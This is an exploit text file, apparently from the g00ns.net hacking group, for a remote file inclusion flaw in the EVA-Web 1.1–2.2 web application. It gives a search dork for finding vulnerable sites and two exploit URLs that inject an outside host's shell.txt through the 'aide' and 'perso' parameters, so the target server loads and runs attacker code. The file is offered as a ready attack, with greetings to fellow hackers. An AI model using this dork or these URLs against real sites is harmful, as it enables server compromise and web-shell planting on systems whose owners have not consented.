evaweb-rfi.txt

`###############################################################################################  
# ___ ___ _  
# / _ \ / _ \ | |  
# __ _| | | | | | |_ __ ___ _ __ ___| |_  
# / _` | | | | | | | '_ \/ __| | '_ \ / _ \ __|  
# | (_| | |_| | |_| | | | \__ \_| | | | __/ |_  
# \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__|  
# __/ |  
# |___/  
###############################################################################################  
#Program Title ################################################################################  
#EVA-Web 1.1<=2.2 Remote File Inclusion  
#  
#Note #######################################################################################  
#A patch was released some time ago..but there was never an exploit released..  
#  
#Script Download ##############################################################################  
#http://spip-edu.edres74.net  
#  
#d0rk ######################################################################################  
#"et utilise le squelette EVA-Web" -3.0 -2.3  
#  
#Spl0it #########################################################################################  
#www.victim.com/[path to webapp]/eva/index.php3?aide=http://www.ursite.com/shell.txt?  
#www.victim.com/[path to webapp]/eva/index.php3?perso=http://www.ursite.com/shell.txt?  
#  
#vuln discovered by ###############################################################################  
#MurderSkillz  
#  
#shoutz: z3r0, milf, godxcel, clorox, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,  
#fish, rey, canuck, ,vipsta, c0ma, grumpy, err0r, sick, trintitty, asdfhacks.com , a59, freeillwill.com, fury,  
#<S>, Bernard, and everyone else at g00ns.net  
###############################################################################################  
  
  
`